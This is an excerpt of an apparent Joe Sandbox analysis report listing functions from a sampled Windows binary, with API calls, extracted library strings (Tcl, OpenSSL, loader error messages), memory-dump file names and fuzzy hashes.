Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: 52a1b502162a3df9c55faab5425b307457f37b133d1d81136829d0f8869aa4da
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: 4902E520A0DB0BD1FE249B66BD205B42BB5BF55794F441031C81E822A0EFBEB558FB53

Function 00007FFDF1273F10 Relevance: 58.0, APIs: 19, Strings: 14, Instructions: 223COMMON

Download Yara Rule

APIs

00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1273F61
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1273F78
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1273F8F
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1273FC2
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF127400B
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF127403F
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1274091
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF12740A4
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF12740BB
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF12740CE
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF12740E5
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF12740F8
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF127410F
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1274122
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1274135
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1274148
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF127415B
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF12741A7
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF12741D2

Strings

X509 CERTIFICATE, xrefs: 00007FFDF12740B1, 00007FFDF127412B
NEW CERTIFICATE REQUEST, xrefs: 00007FFDF12740DB
CERTIFICATE REQUEST, xrefs: 00007FFDF12740EE
PKCS7, xrefs: 00007FFDF1274162
ENCRYPTED PRIVATE KEY, xrefs: 00007FFDF1273F6E
PRIVATE KEY, xrefs: 00007FFDF1273F85, 00007FFDF1273FB4
TRUSTED CERTIFICATE, xrefs: 00007FFDF1274118, 00007FFDF127413E
PKCS #7 SIGNED DATA, xrefs: 00007FFDF127419D
DH PARAMETERS, xrefs: 00007FFDF127409A
CERTIFICATE, xrefs: 00007FFDF12740C4, 00007FFDF1274105, 00007FFDF1274151, 00007FFDF12741C8
ANY PRIVATE KEY, xrefs: 00007FFDF1273F57
PARAMETERS, xrefs: 00007FFDF1274001, 00007FFDF1274031
X9.42 DH PARAMETERS, xrefs: 00007FFDF1274087
CMS, xrefs: 00007FFDF12741D7

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: 00007B5630
String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS
API String ID: 2248877218-1119032718
Opcode ID: 53791607f956101f911f03bce5df1fcc48f1ca8588c3d50ca4fb3c9ab6ede07a
Instruction ID: 745bcb147cc57ff5da82645e03483d5de7198a50be25d17528de47307bae5649
Opcode Fuzzy Hash: 53791607f956101f911f03bce5df1fcc48f1ca8588c3d50ca4fb3c9ab6ede07a
Instruction Fuzzy Hash: 7291AD51B0C69792FF50A765B972A7A26DD9F667E4F482230DD7EC22CDEF2CE4418200

Function 00007FFDF10C1C1C Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 267COMMON

Download Yara Rule

APIs

00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF1171873
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF117199C
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF11719AF
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF1171B4C
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF1171B5F

Strings

application/pkcs7-mime, xrefs: 00007FFDF1171B55
application/x-pkcs7-mime, xrefs: 00007FFDF1171B42
application/pkcs7-signature, xrefs: 00007FFDF11719A5
..\s\crypto\asn1\asn_mime.c, xrefs: 00007FFDF11717EB, 00007FFDF117192D, 00007FFDF11719C5, 00007FFDF1171A41, 00007FFDF1171AC5, 00007FFDF1171AF7, 00007FFDF1171B75, 00007FFDF1171BFC
content-type, xrefs: 00007FFDF1171824
boundary, xrefs: 00007FFDF1171884
multipart/signed, xrefs: 00007FFDF1171869
type: , xrefs: 00007FFDF11719DE, 00007FFDF1171B8E
application/x-pkcs7-signature, xrefs: 00007FFDF1171992

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: 00007B5630
String ID: ..\s\crypto\asn1\asn_mime.c$application/pkcs7-mime$application/pkcs7-signature$application/x-pkcs7-mime$application/x-pkcs7-signature$boundary$content-type$multipart/signed$type:
API String ID: 2248877218-3630080479
Opcode ID: c5e941614d640384612458e50034d29bbe1bfb110b92bc5b5dde121a4aa43e48
Instruction ID: 425271e132668fc3b72419ae1836a71d17f81c212792778fb50be455bfabb407
Opcode Fuzzy Hash: c5e941614d640384612458e50034d29bbe1bfb110b92bc5b5dde121a4aa43e48
Instruction Fuzzy Hash: 63C1CEA2F0C24281FB20EB55A431EB963A9AF51784F544135E96D077CEEF3CE245EB00

Function 00007FF6266481C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF626649400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6266445E4,00000000,00007FF626641985), ref: 00007FF626649439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6266488A7,?,?,00000000,00007FF626643CBB), ref: 00007FF62664821C

Part of subcall function 00007FF626642810: MessageBoxW.USER32 ref: 00007FF6266428EA

Strings

%.*s, xrefs: 00007FF6266482FC
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF626648363
CreateDirectory, xrefs: 00007FF62664836C
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF626648230
\, xrefs: 00007FF626648251
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6266482C9
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6266481F3
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF62664828D

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
Instruction ID: 04a8cfa91c8a9c47066c1d2292dbf4f918ec7b05d4434c5f44187cc4d9a66969
Opcode Fuzzy Hash: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
Instruction Fuzzy Hash: 3851D621A1C68391FF719B26EC612BA6391FF94780F444035EA0EC26D5EF6EE404AF43

Function 00007FF626641600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON

Download Yara Rule

Strings

Failed to create symbolic link %s!, xrefs: 00007FF626641622
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6266416DA
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6266417DF
fread, xrefs: 00007FF6266417E6
Failed to extract %s: failed to open target file!, xrefs: 00007FF62664165C
fseek, xrefs: 00007FF6266416E1
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF626641742
fwrite, xrefs: 00007FF6266417D1
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6266417CA
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6266416A2
malloc, xrefs: 00007FF626641749
fopen, xrefs: 00007FF626641663

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: b438ac9593aa65caaca4b757467b05afc463448879c6b570786e287927310b36
Instruction ID: 9fd49d4c37a0bdb35a722818300c5b6cbf9a551bb22c82d0cf9a393ea00ed500
Opcode Fuzzy Hash: b438ac9593aa65caaca4b757467b05afc463448879c6b570786e287927310b36
Instruction Fuzzy Hash: 9B51BD21B0C64392EE20AB12EC611B9A390BF80794F444135EE0C97B96DF7EF555AB43

Function 00007FFDF10C4E3F Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 205registryfileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FFDF11CDC24
GetFileType.KERNEL32 ref: 00007FFDF11CDC35
WriteFile.KERNEL32 ref: 00007FFDF11CDC99
MultiByteToWideChar.KERNEL32 ref: 00007FFDF11CDD06
RegisterEventSourceW.ADVAPI32 ref: 00007FFDF11CDEB4
ReportEventW.ADVAPI32 ref: 00007FFDF11CDEF6
DeregisterEventSource.ADVAPI32 ref: 00007FFDF11CDEFF

Strings

OpenSSL, xrefs: 00007FFDF11CDEAD
OpenSSL: FATAL, xrefs: 00007FFDF11CDF0D
, xrefs: 00007FFDF11CDD20
no stack?, xrefs: 00007FFDF11CDCEC

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite
String ID: $OpenSSL$OpenSSL: FATAL$no stack?
API String ID: 1270133462-2963566556
Opcode ID: 4334f370b7a482bd35c4ecd3ae7f0d910e81077902a64c89114c2b2096981407
Instruction ID: c29c2b8bd3cc78a3fb01a253d3540666c4d5fa2985889666c18b6fa97c4f5aa5
Opcode Fuzzy Hash: 4334f370b7a482bd35c4ecd3ae7f0d910e81077902a64c89114c2b2096981407
Instruction Fuzzy Hash: 5A91E133B08B8682EB209F24D8609FD3768FB85B94F444235EA6D07AD9EF38D255C340

Function 00007FFDF10C32AB Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

00007FFE1FFA1370.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFDF12BAB7C
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF12BAB91
00007FFE1FFA1370.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFDF12BABA3

Strings

accuracy, xrefs: 00007FFDF12BAAB3, 00007FFDF12BAB03, 00007FFDF12BAC54
millisecs, xrefs: 00007FFDF12BAB87
microsecs, xrefs: 00007FFDF12BABAE
..\s\crypto\ts\ts_conf.c, xrefs: 00007FFDF12BAAF0, 00007FFDF12BAC3C
secs, xrefs: 00007FFDF12BAB4D
p, xrefs: 00007FFDF12BAC34

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: 00007$A1370$B5630
String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
API String ID: 751195488-1596076588
Opcode ID: 8e1608afc237cc655a59732373ba8e0b1afa52b80ee81b2eea672c0bd8193b25
Instruction ID: f9b57eaa60412a28cde256425ff3567be1b56219a7daeace1c95454c895e2f75
Opcode Fuzzy Hash: 8e1608afc237cc655a59732373ba8e0b1afa52b80ee81b2eea672c0bd8193b25
Instruction Fuzzy Hash: DF51C122B086079AEB11EB96A831EB973A9BF54B84F444435ED2E437D9EF3CE445D700

Function 00007FF626642180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6266421AB
SelectObject.GDI32 ref: 00007FF6266421F2
DrawTextW.USER32 ref: 00007FF626642215
SelectObject.GDI32 ref: 00007FF62664222B
ReleaseDC.USER32 ref: 00007FF62664223B
MoveWindow.USER32 ref: 00007FF62664228B
MoveWindow.USER32 ref: 00007FF6266422CB
MoveWindow.USER32 ref: 00007FF62664231E
MoveWindow.USER32 ref: 00007FF626642366

Strings

P%, xrefs: 00007FF6266421FF

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: b4d3d7b245f7f635bbbeb699d513663e80868ba9c8c7cce30d2e9e131e67c785
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: FB510726614BA286DA349F22F8181BAB7A1F798B61F004121EFDE83794DF7DD085DB10

Function 00007FF6266480B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6266480EF
GetWindowLongPtrW.USER32 ref: 00007FF62664816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF626648182
GetLastError.KERNEL32 ref: 00007FF62664818C
SetWindowLongPtrW.USER32 ref: 00007FF6266481A3

Strings

Needs to remove its temporary files., xrefs: 00007FF626648175

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: 1426544a9756ec20af9dff9ae31493eface032b7b33c81044994c0759084944c
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: 56214F21B09A83C2EF558B7ABC641796350FF88B90F584235DA2DC33D8DE6DD5A19B03

Function 00007FFE101DA2AC Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFE101DA2D4
__scrt_initialize_crt.LIBCMT ref: 00007FFE101DA319
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFE101DA326
_RTC_Initialize.LIBCMT ref: 00007FFE101DA354
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFE101DA37A
